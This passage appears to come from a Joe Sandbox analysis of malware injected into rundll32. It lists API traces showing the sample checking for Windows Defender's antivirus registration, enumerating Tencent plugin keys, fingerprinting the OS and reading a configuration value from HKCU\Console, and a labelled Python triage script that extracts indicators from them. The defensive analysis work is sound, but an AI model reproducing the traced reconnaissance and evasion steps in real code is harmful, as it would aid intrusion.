4dbaf06-4dbaf0f call 4dbef59 2856->2864 2865 4dbaf15-4dbaf39 call 4dbef80 2856->2865 2857->2838 2858->2857 2876 4dbb0d2-4dbb0d8 call 4dbfa29 2858->2876 2864->2865 2865->2806 2876->2857
                              APIs
                              • RegOpenKeyExW.KERNELBASE(80000001,Console,00000000,00020019,?), ref: 04DBACE3
                              • RegQueryValueExW.KERNEL32(?,IpDatespecial,00000000,?,00000000,?), ref: 04DBAD03
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3545390352.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: true
                              • Associated: 00000003.00000002.3545390352.0000000004DE4000.00000040.00001000.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4db0000_rundll32.jbxd
                              Similarity
                              • API ID: OpenQueryValue
                              • String ID: %s_bin$Console$Console\0$IpDatespecial
                              • API String ID: 4153817207-1338088003
                              • Opcode ID: dd23af12859f671b8f85d4eafdcc0cd2761b01f798a580e29c5d9c3690504440
                              • Instruction ID: 55428c4aa81d78659b699be0f9f503cbcb188825ec47d9527649daed3516b97b
                              • Opcode Fuzzy Hash: dd23af12859f671b8f85d4eafdcc0cd2761b01f798a580e29c5d9c3690504440
                              • Instruction Fuzzy Hash: 9FC180B1700201EBE714EF24DC45FAB73A9FB98718F044569F98A9B381E675F904C6E2

                              Control-flow Graph

                              control_flow_graph 2879 4db60e0-4db6135 call 4dc67e0 call 4dbffa9 2884 4db6191-4db61b8 CoCreateInstance 2879->2884 2885 4db6137-4db613e 2879->2885 2886 4db61be-4db6212 2884->2886 2887 4db63b2-4db63bf lstrlenW 2884->2887 2888 4db6140-4db6142 call 4db5fe0 2885->2888 2896 4db639a-4db63a8 2886->2896 2897 4db6218-4db6232 2886->2897 2889 4db63d1-4db63e0 2887->2889 2890 4db63c1-4db63cb lstrcatW 2887->2890 2895 4db6147-4db6149 2888->2895 2893 4db63ea-4db640a call 4dbef64 2889->2893 2894 4db63e2-4db63e7 2889->2894 2890->2889 2894->2893 2899 4db616b-4db618f call 4dbffa9 2895->2899 2900 4db614b-4db6169 lstrcatW * 2 2895->2900 2896->2887 2902 4db63aa-4db63af 2896->2902 2897->2896 2906 4db6238-4db6244 2897->2906 2899->2884 2899->2888 2900->2899 2902->2887 2907 4db6250-4db62f3 call 4dc67e0 wsprintfW RegOpenKeyExW 2906->2907 2910 4db6379-4db638f 2907->2910 2911 4db62f9-4db634a call 4dc67e0 RegQueryValueExW 2907->2911 2913 4db6392-4db6394 2910->2913 2915 4db636c-4db6373 RegCloseKey 2911->2915 2916 4db634c-4db636a lstrcatW * 2 2911->2916 2913->2896 2913->2907 2915->2910 2916->2915
                              APIs
                              • _memset.LIBCMT ref: 04DB611B
                              • lstrcatW.KERNEL32(04DE1F10,04DD510C,?,B7FCE562,75BF73E0,00000000,00000AD4), ref: 04DB615D
                              • lstrcatW.KERNEL32(04DE1F10,04DD535C,?,B7FCE562,75BF73E0,00000000,00000AD4), ref: 04DB6169
                              • CoCreateInstance.OLE32(04DD2480,00000000,00000017,04DD578C,?,?,B7FCE562,75BF73E0,00000000,00000AD4), ref: 04DB61B0
                              • _memset.LIBCMT ref: 04DB625E
                              • wsprintfW.USER32 ref: 04DB62C6
                              • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 04DB62EF
                              • _memset.LIBCMT ref: 04DB6306
                                • Part of subcall function 04DB5FE0: _memset.LIBCMT ref: 04DB600C
                                • Part of subcall function 04DB5FE0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00000000), ref: 04DB6018
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3545390352.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: true
                              • Associated: 00000003.00000002.3545390352.0000000004DE4000.00000040.00001000.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4db0000_rundll32.jbxd
                              Similarity
                              • API ID: _memset$Createlstrcat$InstanceOpenSnapshotToolhelp32wsprintf
                              • String ID: CLSID\{%.8X-%.4X-%.4X-%.2X%.2X-%.2X%.2X%.2X%.2X%.2X%.2X}$Windows Defender IOfficeAntiVirus implementation
                              • API String ID: 1221949200-1583895642
                              • Opcode ID: c9b49299c4083dc14efa10410fe3535bdaa8514155d866578d6d994c7dec08ce
                              • Instruction ID: 2ec27e0c51b5605b12213f861f42ac92c2842421008421eba7c64f0a20f31c49
                              • Opcode Fuzzy Hash: c9b49299c4083dc14efa10410fe3535bdaa8514155d866578d6d994c7dec08ce
                              • Instruction Fuzzy Hash: 468172B2B00228ABDB20DB55CC90FEEB7B8EB48704F0445D9F649A7241D674BE45CFA5

                              Control-flow Graph

                              control_flow_graph 2917 4db5ed0-4db5f0b CreateMutexW GetLastError 2918 4db5f2b-4db5f32 2917->2918 2919 4db5f0d 2917->2919 2921 4db5f93-4db5fbc GetModuleHandleW GetConsoleWindow call 4dbe450 2918->2921 2922 4db5f34-4db5f3a 2918->2922 2920 4db5f10-4db5f29 Sleep CreateMutexW GetLastError 2919->2920 2920->2918 2920->2920 2927 4db5fbe-4db5fd4 call 4dbef64 2921->2927 2928 4db5fd7-4db5fdf call 4dbe7b0 2921->2928 2923 4db5f40-4db5f71 call 4dc67e0 lstrlenW call 4db6cf0 2922->2923 2936 4db5f83-4db5f91 Sleep 2923->2936 2937 4db5f73-4db5f81 lstrcmpW 2923->2937 2936->2921 2936->2923 2937->2921 2937->2936
                              APIs
                              • CreateMutexW.KERNEL32(00000000,00000000,2024.12.19), ref: 04DB5EF6
                              • GetLastError.KERNEL32 ref: 04DB5EFE
                              • Sleep.KERNEL32(000003E8), ref: 04DB5F15
                              • CreateMutexW.KERNEL32(00000000,00000000,2024.12.19), ref: 04DB5F20
                              • GetLastError.KERNEL32 ref: 04DB5F22
                              • _memset.LIBCMT ref: 04DB5F49
                              • lstrlenW.KERNEL32(?), ref: 04DB5F56
                              • lstrcmpW.KERNEL32(?,04DD5328), ref: 04DB5F7D
                              • Sleep.KERNEL32(000003E8), ref: 04DB5F88
                              • GetModuleHandleW.KERNEL32(00000000), ref: 04DB5F95
                              • GetConsoleWindow.KERNEL32 ref: 04DB5F9F
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3545390352.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: true
                              • Associated: 00000003.00000002.3545390352.0000000004DE4000.00000040.00001000.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4db0000_rundll32.jbxd
                              Similarity
                              • API ID: CreateErrorLastMutexSleep$ConsoleHandleModuleWindow_memsetlstrcmplstrlen
                              • String ID: 2024.12.19$key$open
                              • API String ID: 2922109467-2390376316
                              • Opcode ID: d41fc9222c7846f19f36f993a4a2b1bc354113097895b6168966d245da29c4a3
                              • Instruction ID: 08230956b3a2a7d283886a6fb59feb933784c1243886b864d6a93c7bfde05a98
                              • Opcode Fuzzy Hash: d41fc9222c7846f19f36f993a4a2b1bc354113097895b6168966d245da29c4a3
                              • Instruction Fuzzy Hash: 4E21A672A44305EBE714EF64EC65F9AB794EB88708F100829F645972C0DA74F909CBE3

                              Control-flow Graph

                              control_flow_graph 2938 4db6246-4db624d 2939 4db6250-4db62f3 call 4dc67e0 wsprintfW RegOpenKeyExW 2938->2939 2942 4db6379-4db638f 2939->2942 2943 4db62f9-4db6306 call 4dc67e0 2939->2943 2945 4db6392-4db6394 2942->2945 2946 4db630b-4db634a RegQueryValueExW 2943->2946 2945->2939 2949 4db639a-4db63a8 2945->2949 2947 4db636c-4db6373 RegCloseKey 2946->2947 2948 4db634c-4db636a lstrcatW * 2 2946->2948 2947->2942 2948->2947 2950 4db63aa-4db63af 2949->2950 2951 4db63b2-4db63bf lstrlenW 2949->2951 2950->2951 2952 4db63d1-4db63e0 2951->2952 2953 4db63c1-4db63cb lstrcatW 2951->2953 2954 4db63ea-4db640a call 4dbef64 2952->2954 2955 4db63e2-4db63e7 2952->2955 2953->2952 2955->2954
                              APIs
                              • _memset.LIBCMT ref: 04DB625E
                              • wsprintfW.USER32 ref: 04DB62C6
                              • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 04DB62EF
                              • _memset.LIBCMT ref: 04DB6306
                              • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,?,?,?), ref: 04DB6342
                              • lstrcatW.KERNEL32(04DE1F10,?), ref: 04DB635E
                              • lstrcatW.KERNEL32(04DE1F10,04DD535C), ref: 04DB636A
                              • RegCloseKey.ADVAPI32(00000000), ref: 04DB6373
                              • lstrlenW.KERNEL32(04DE1F10,?,B7FCE562,75BF73E0,00000000,00000AD4), ref: 04DB63B7
                              • lstrcatW.KERNEL32(04DE1F10,04DD53D4,?,B7FCE562,75BF73E0,00000000,00000AD4), ref: 04DB63CB
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3545390352.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: true
                              • Associated: 00000003.00000002.3545390352.0000000004DE4000.00000040.00001000.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4db0000_rundll32.jbxd
                              Similarity
                              • API ID: lstrcat$_memset$CloseOpenQueryValuelstrlenwsprintf
                              • String ID: CLSID\{%.8X-%.4X-%.4X-%.2X%.2X-%.2X%.2X%.2X%.2X%.2X%.2X}$Windows Defender IOfficeAntiVirus implementation
                              • API String ID: 1671694837-1583895642
                              • Opcode ID: 3fee21299686d1f9db9d4f848b6e1ff525f2632f890eb5a198e0d9390c0d8e50
                              • Instruction ID: b43d0268d950d4397ae7346d782bd62941413c0b63e954da88651dcb59d660f3
                              • Opcode Fuzzy Hash: 3fee21299686d1f9db9d4f848b6e1ff525f2632f890eb5a198e0d9390c0d8e50
                              • Instruction Fuzzy Hash: 5D4196B1600228ABDB24DB55CC54FFEB7B8AF48705F0441C9F349A7281D674AA85CFA5

                              Control-flow Graph

                              control_flow_graph 2958 4db7410-4db7426 LoadLibraryW 2959 4db751e-4db7522 2958->2959 2960 4db742c-4db743a GetProcAddress 2958->2960 2961 4db7440-4db74a5 call 4dbf7b8 call 4dbef4e call 4db7390 2960->2961 2962 4db7517-4db7518 FreeLibrary 2960->2962 2970 4db74b2-4db74b6 2961->2970 2971 4db74a7-4db74b0 2961->2971 2962->2959 2972 4db74bb-4db74eb RegOpenKeyExW RegQueryValueExW 2970->2972 2971->2972 2973 4db74ed-4db74ef 2972->2973 2974 4db7502-4db750d RegCloseKey call 4dbfa29 2972->2974 2973->2974 2975 4db74f1-4db74ff call 4dbfb6e 2973->2975 2978 4db7512-4db7516 2974->2978 2975->2974 2978->2962
                              APIs
                              • LoadLibraryW.KERNEL32(ntdll.dll,74DEDF80,?,?,?,04DB55A1,0000035E,000002FA), ref: 04DB741C
                              • GetProcAddress.KERNEL32(00000000,RtlGetNtVersionNumbers), ref: 04DB7432
                              • swprintf.LIBCMT ref: 04DB746F
                                • Part of subcall function 04DB7390: GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,?,?,?,?,?,?,04DB74A3), ref: 04DB73BD
                                • Part of subcall function 04DB7390: GetProcAddress.KERNEL32(00000000), ref: 04DB73C4
                                • Part of subcall function 04DB7390: GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,04DB74A3), ref: 04DB73D2
                              • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020019,000002FA), ref: 04DB74C7
                              • RegQueryValueExW.KERNEL32(000002FA,ProductName,00000000,00000001,00000000,?), ref: 04DB74E3
                              • RegCloseKey.KERNEL32(000002FA), ref: 04DB7506
                              • FreeLibrary.KERNEL32(00000000,?,?,?,04DB55A1,0000035E,000002FA), ref: 04DB7518
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3545390352.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: true
                              • Associated: 00000003.00000002.3545390352.0000000004DE4000.00000040.00001000.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4db0000_rundll32.jbxd
                              Similarity
                              • API ID: AddressLibraryProc$CloseFreeHandleInfoLoadModuleNativeOpenQuerySystemValueswprintf
                              • String ID: %d.%d.%d$ProductName$RtlGetNtVersionNumbers$SOFTWARE\Microsoft\Windows NT\CurrentVersion$ntdll.dll
                              • API String ID: 2158625971-3190923360
                              • Opcode ID: facacc9bb9db3f2fe39a7c5544d882d9fa9972512471af9a5051aef6eb387dda
                              • Instruction ID: 3ac757c08aa6046f45408d5194164e42f166c3355245325ff098989a440b9b9f
                              • Opcode Fuzzy Hash: facacc9bb9db3f2fe39a7c5544d882d9fa9972512471af9a5051aef6eb387dda
                              • Instruction Fuzzy Hash: 4D31B671B01208BBDB15DBA4DD55EFF77BCEB48700F104558BA06E6241E674EB00CBA0
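The records above are the ones a triager pulls out of this listing by hand: the routine at 04DB2DBB (socket(2,1,6), gethostbyname, htons, connect, i.e. resolve a host name and open a TCP connection), the configuration read at 04DBACE3 (RegOpenKeyExW on HKEY_CURRENT_USER\Console followed by RegQueryValueExW of the value IpDatespecial), the mutex "2024.12.19" created at 04DB5EF6, and the OS fingerprint at 04DB741C (RtlGetNtVersionNumbers plus ProductName under SOFTWARE\Microsoft\Windows NT\CurrentVersion). The following Python script is an added example, not part of the Joe Sandbox report or its IDA plugin: it parses the report's own "APIs" bullet format into structured calls, flags the resolve-then-connect pattern, and extracts mutex names and registry key/value pairs as host indicators. The embedded sample records are copied from the bullets on this page; the HKEY root table, the set of API names treated as equivalent (getaddrinfo, GetAddrInfoW, WSAConnect) and the rule that pairs a RegOpenKeyEx* subkey with the RegQueryValueEx* calls after it are the example's own assumptions. Arguments the sandbox prints as "?" or a bare 8-digit hex value were not resolved to a string at analysis time and are deliberately skipped.

```python
"""Added example (not from the Joe Sandbox report): structure the "APIs"
bullets of a function record and derive triage findings from them."""
import re

# One "APIs" bullet as printed in the report, e.g.
#   • socket.WS2_32(00000002,00000001,00000006), ref: 04DB2DFA
#   • timeGetTime.WINMM ref: 04DB2DCD
#   • Part of subcall function 04DBF5D3: RtlAllocateHeap.NTDLL(...), ref: 04DBF618
BULLET_RE = re.compile(
    r"•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s+ref:\s*(?P<ref>[0-9A-Fa-f]+)")

# HKEY_* root handles as they appear in RegOpenKeyExW's first argument (assumed table).
HIVES = {"80000000": "HKCR", "80000001": "HKCU", "80000002": "HKLM", "80000003": "HKU"}

# Sample records copied from the report's "APIs" listings on this page (trimmed).
CONNECT_RECORD = r"""
• ResetEvent.KERNEL32(?), ref: 04DB2DBB
• socket.WS2_32(00000002,00000001,00000006), ref: 04DB2DFA
• lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 04DB2E26
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 04DB2E32
• gethostbyname.WS2_32(00000000), ref: 04DB2E6B
• htons.WS2_32(?), ref: 04DB2E8D
• connect.WS2_32(?,?,00000010), ref: 04DB2EAB
"""
CONFIG_RECORD = r"""
• RegOpenKeyExW.KERNELBASE(80000001,Console,00000000,00020019,?), ref: 04DBACE3
• RegQueryValueExW.KERNEL32(?,IpDatespecial,00000000,?,00000000,?), ref: 04DBAD03
"""
MUTEX_RECORD = r"""
• CreateMutexW.KERNEL32(00000000,00000000,2024.12.19), ref: 04DB5EF6
• GetLastError.KERNEL32 ref: 04DB5EFE
"""
VERSION_RECORD = r"""
• RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020019,000002FA), ref: 04DB74C7
• RegQueryValueExW.KERNEL32(000002FA,ProductName,00000000,00000001,00000000,?), ref: 04DB74E3
"""


def _is_opaque(arg):
    """The report prints arguments it could not resolve to a string as '?' or 8 hex digits."""
    return arg == "?" or re.fullmatch(r"[0-9A-Fa-f]{8}", arg) is not None


def parse_calls(record_text):
    """Return the bullets of one record as dicts, in printed order (ascending call-site ref)."""
    calls = []
    for m in BULLET_RE.finditer(record_text):
        raw = m.group("args")
        calls.append({
            "api": m.group("api"),
            "module": m.group("module"),
            "args": [a.strip() for a in raw.split(",")] if raw else [],
            "ref": int(m.group("ref"), 16),
            "subcall": m.group("sub") is not None,   # bullet belongs to a callee, not this function
        })
    return calls


def is_connect_routine(calls):
    """True when the record opens a TCP socket (AF_INET=2, SOCK_STREAM=1, IPPROTO_TCP=6),
    resolves a host name, and then calls connect, in that order."""
    first = {}
    for i, c in enumerate(calls):
        if c["module"] != "WS2_32" or c["subcall"]:
            continue
        if c["api"] == "socket" and c["args"][:3] == ["00000002", "00000001", "00000006"]:
            first.setdefault("socket", i)
        elif c["api"] in ("gethostbyname", "getaddrinfo", "GetAddrInfoW"):
            first.setdefault("resolve", i)
        elif c["api"] in ("connect", "WSAConnect"):
            first.setdefault("connect", i)
    return (all(k in first for k in ("socket", "resolve", "connect"))
            and first["socket"] < first["resolve"] < first["connect"])


def extract_iocs(calls):
    """Collect mutex names (CreateMutex* third argument) and (key, value) pairs, pairing each
    RegOpenKeyEx* hive+subkey with the value names later RegQueryValueEx* calls read."""
    iocs = {"mutexes": [], "registry": []}
    current_key = None
    for c in calls:
        if c["subcall"]:
            continue
        args = c["args"]
        if c["api"].startswith("CreateMutex") and len(args) >= 3 and not _is_opaque(args[2]):
            iocs["mutexes"].append(args[2])
        elif c["api"].startswith("RegOpenKeyEx") and len(args) >= 2:
            hive = HIVES.get(args[0], args[0])
            current_key = None if _is_opaque(args[1]) else hive + "\\" + args[1]
        elif c["api"].startswith("RegQueryValueEx") and current_key and len(args) >= 2:
            if not _is_opaque(args[1]):
                iocs["registry"].append((current_key, args[1]))
    return iocs


if __name__ == "__main__":
    print("connect routine:", is_connect_routine(parse_calls(CONNECT_RECORD)))
    print(extract_iocs(parse_calls(CONFIG_RECORD + MUTEX_RECORD + VERSION_RECORD)))
```

Any other record on this page can be pasted in the same way. The connect routine appears twice in the dump, at 04DB2DBB in the 04DB0000 region and at 04202D9B in the 04200000 region, with the same API String ID 640718063-3203441087, so the check matches both copies; the registry value name is only recoverable because the sandbox resolved the IpDatespecial and Console strings, which is why opaque arguments are skipped rather than guessed.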
                              APIs
                              • GlobalAlloc.KERNEL32(00000002,?,B7FCE562,?,00000000,?), ref: 04DBC01E
                              • GlobalLock.KERNEL32(00000000), ref: 04DBC02A
                              • GlobalUnlock.KERNEL32(00000000), ref: 04DBC03F
                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 04DBC055
                              • EnterCriticalSection.KERNEL32(04DDFB64), ref: 04DBC093
                              • LeaveCriticalSection.KERNEL32(04DDFB64), ref: 04DBC0A4
                                • Part of subcall function 04DB9D30: GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 04DB9D54
                                • Part of subcall function 04DB9D30: GdipDisposeImage.GDIPLUS(?), ref: 04DB9D68
                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 04DBC0CC
                                • Part of subcall function 04DBA3B0: GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 04DBA3DD
                                • Part of subcall function 04DBA3B0: _free.LIBCMT ref: 04DBA453
                              • GetHGlobalFromStream.OLE32(?,?), ref: 04DBC0ED
                              • GlobalLock.KERNEL32(?), ref: 04DBC0F7
                              • GlobalFree.KERNEL32(00000000), ref: 04DBC10F
                                • Part of subcall function 04DB9B00: DeleteObject.GDI32(?), ref: 04DB9B32
                                • Part of subcall function 04DB9B00: EnterCriticalSection.KERNEL32(04DDFB64,?,?,?,04DB9ADB), ref: 04DB9B43
                                • Part of subcall function 04DB9B00: EnterCriticalSection.KERNEL32(04DDFB64,?,?,?,04DB9ADB), ref: 04DB9B58
                                • Part of subcall function 04DB9B00: GdiplusShutdown.GDIPLUS(00000000,?,?,?,04DB9ADB), ref: 04DB9B64
                                • Part of subcall function 04DB9B00: LeaveCriticalSection.KERNEL32(04DDFB64,?,?,?,04DB9ADB), ref: 04DB9B75
                                • Part of subcall function 04DB9B00: LeaveCriticalSection.KERNEL32(04DDFB64,?,?,?,04DB9ADB), ref: 04DB9B7C
                              • GlobalSize.KERNEL32(00000000), ref: 04DBC125
                              • GlobalUnlock.KERNEL32(?), ref: 04DBC1A0
                              • GlobalFree.KERNEL32(00000000), ref: 04DBC1C8
                              Memory Dump Source
                              • Source File: 00000003.00000002.3545390352.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: true
                               • Associated: 00000003.00000002.3545390352.0000000004DE4000.00000040.00001000.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4db0000_rundll32.jbxd
                              Similarity
                              • API ID: Global$CriticalSection$Stream$CreateEnterGdipLeave$FreeFromImageLockSizeUnlock$AllocBitmapDeleteDisposeEncodersGdiplusObjectShutdown_free
                              • String ID:
                              • API String ID: 1483550337-0
                              • Opcode ID: 01f8ec170c4cdc2282840ed64fa05f83633580d43a15436a8a34f38d4e2000fa
                              • Instruction ID: 964b1ad2a88beaf334bf3191758ab52673fb11d43d620e95b45ed11e3be58b60
                              • Opcode Fuzzy Hash: 01f8ec170c4cdc2282840ed64fa05f83633580d43a15436a8a34f38d4e2000fa
                              • Instruction Fuzzy Hash: 886106B1E01218EFDB10EFA4D8949DEBBB8FF49704F10856EE516A7340DB34A901CBA0
                              APIs
                              • _memset.LIBCMT ref: 04DB6452
                              • RegOpenKeyExW.KERNEL32(80000001,Software\Tencent\Plugin\VAS,00000000,000F003F,?), ref: 04DB6472
                              • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,00000000), ref: 04DB64B4
                              • _memset.LIBCMT ref: 04DB64F0
                              • _memset.LIBCMT ref: 04DB651E
                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00000000,75BF73E0,00000AD4), ref: 04DB654A
                              • lstrlenW.KERNEL32(?,?,?,?,00000000,75BF73E0,00000AD4), ref: 04DB6553
                              • lstrlenW.KERNEL32(?,?,?,?,00000000,75BF73E0,00000AD4), ref: 04DB6565
                              • RegCloseKey.ADVAPI32(?,00000000,75BF73E0,00000AD4), ref: 04DB65B5
                              • lstrlenW.KERNEL32(?), ref: 04DB65C5
                              Strings
                              • Software\Tencent\Plugin\VAS, xrefs: 04DB6468
                              Memory Dump Source
                              • Source File: 00000003.00000002.3545390352.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: true
                               • Associated: 00000003.00000002.3545390352.0000000004DE4000.00000040.00001000.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4db0000_rundll32.jbxd
                              Similarity
                              • API ID: _memsetlstrlen$CloseEnumInfoOpenQuery
                              • String ID: Software\Tencent\Plugin\VAS
                              • API String ID: 2921034913-3343197220
                              • Opcode ID: 6740dd69e7fd162d17e1592d0848b3e78dc07182b0366dc93814ba2a912ad895
                              • Instruction ID: 3a7d87d86c5439572a277822781d7576d277b540753bbffa39d3cb125803301b
                              • Opcode Fuzzy Hash: 6740dd69e7fd162d17e1592d0848b3e78dc07182b0366dc93814ba2a912ad895
                              • Instruction Fuzzy Hash: D64189F1A40219EBDB24DB50CD85FEA73B8EB44704F0085D9F709B7181EA70EA858BA5
                              APIs
                                • Part of subcall function 04DB52C0: InterlockedDecrement.KERNEL32(00000008), ref: 04DB530C
                                • Part of subcall function 04DB52C0: SysFreeString.OLEAUT32(00000000), ref: 04DB5321
                                • Part of subcall function 04DB52C0: SysAllocString.OLEAUT32(04DD5148), ref: 04DB5372
                               • GetTokenInformation.KERNELBASE(00000000,00000001(TokenUser),00000000,00000000,?,?,04DB6934,00000000,00000994), ref: 04DB678B
                               • GetLastError.KERNEL32 ref: 04DB6791
                               • GetProcessHeap.KERNEL32(00000008,?), ref: 04DB67A9
                               • HeapAlloc.KERNEL32(00000000), ref: 04DB67B0
                               • GetTokenInformation.KERNELBASE(00000000,00000001(TokenUser),00000000,?,?), ref: 04DB67D2
                              • LookupAccountSidW.ADVAPI32(00000000,?,?,00000100,?,00000100,?), ref: 04DB6800
                              • GetLastError.KERNEL32 ref: 04DB680A
                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 04DB6879
                              • HeapFree.KERNEL32(00000000), ref: 04DB6880
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3545390352.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: true
                               • Associated: 00000003.00000002.3545390352.0000000004DE4000.00000040.00001000.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4db0000_rundll32.jbxd
                              Similarity
                              • API ID: Heap$AllocErrorFreeInformationLastProcessStringToken$AccountDecrementInterlockedLookup
                              • String ID: NONE_MAPPED
                              • API String ID: 1317816589-2950899194
                              • Opcode ID: 2a90b52ba7e99c1c8ee335a0fc1f4457b88f35af0e57cbbc3df74e8351b93bcd
                              • Instruction ID: 5abe6026112a93466c5456caac101c5d90c9c06f01c3e5fe1faf6471188bcc46
                              • Opcode Fuzzy Hash: 2a90b52ba7e99c1c8ee335a0fc1f4457b88f35af0e57cbbc3df74e8351b93bcd
                              • Instruction Fuzzy Hash: 1141A2B5A01208EBDB24DF54DD94FEE7378EB84704F0040E9E64AA7240DB74AE85CFA5
                              APIs
                              • memmove.VCRUNTIME140(?,?,00000098), ref: 6CC14A3A
                              • memmove.VCRUNTIME140(?,?,00000188), ref: 6CC14A7C
                              • memmove.VCRUNTIME140(?,?,00000029), ref: 6CC14C4B
                              • memmove.VCRUNTIME140(?,?,00000029), ref: 6CC14D08
                              • memmove.VCRUNTIME140(?,?,00000029), ref: 6CC14D40
                              • memmove.VCRUNTIME140(?,?,000000D0), ref: 6CC14DC4
                              • memmove.VCRUNTIME140(?,?,000000D4), ref: 6CC14DDB
                              • memmove.VCRUNTIME140(?,?,000000D4), ref: 6CC14E62
                              • memmove.VCRUNTIME140(?,?,00000114), ref: 6CC14F5D
                              • memmove.VCRUNTIME140(?,?,00000114), ref: 6CC1502A
                              • memmove.VCRUNTIME140(?,?,000000B8), ref: 6CC15052
                              • memmove.VCRUNTIME140(?,?,000000B8), ref: 6CC15104
                              • memmove.VCRUNTIME140(?,00000009,00000118), ref: 6CC1534C
                              • memmove.VCRUNTIME140(?,00000009,00000118), ref: 6CC15381
                              • memmove.VCRUNTIME140(?,00000009,00000118), ref: 6CC15832
                              • memmove.VCRUNTIME140(?,?,00000118), ref: 6CC15EB4
                              • memmove.VCRUNTIME140(?,?,0000011C), ref: 6CC15ED2
                              • memmove.VCRUNTIME140(0000002C,?,0000011C), ref: 6CC15F29
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                               • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: memmove
                              • String ID: U9W{
                              • API String ID: 2162964266-3288374708
                              • Opcode ID: e08d6ca63233d99300c7d0dfce97315346de34412a9d50d9b01b2a1700f951be
                              • Instruction ID: b4d463b8a3ea65771647e25b4c006c3e3235bbb90ef7d2ad190d3d3024de5059
                              • Opcode Fuzzy Hash: e08d6ca63233d99300c7d0dfce97315346de34412a9d50d9b01b2a1700f951be
                              • Instruction Fuzzy Hash: 3F22BE75908B858FC722CF25C8807DBB7F5BF9A301F044A6DD8881F642EB709589DB92
                              APIs
                              • GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 04DBA3DD
                              • _malloc.LIBCMT ref: 04DBA421
                              • _free.LIBCMT ref: 04DBA453
                              • GdipGetImageEncoders.GDIPLUS(?,?,00000008), ref: 04DBA472
                              • GdipSaveImageToStream.GDIPLUS(00000000,?,?,00000000), ref: 04DBA4E4
                              • GdipDisposeImage.GDIPLUS(00000000), ref: 04DBA4EF
                              • GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 04DBA515
                              • GdipDisposeImage.GDIPLUS(00000000), ref: 04DBA52D
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3545390352.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: true
                               • Associated: 00000003.00000002.3545390352.0000000004DE4000.00000040.00001000.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4db0000_rundll32.jbxd
                              Similarity
                              • API ID: Gdip$Image$DisposeEncoders$BitmapCreateFromSaveSizeStream_free_malloc
                              • String ID: &
                              • API String ID: 2794124522-3042966939
                              • Opcode ID: b47876c5398676345a9b57e5c024cdbc06a00509f4b1505159697864065484a3
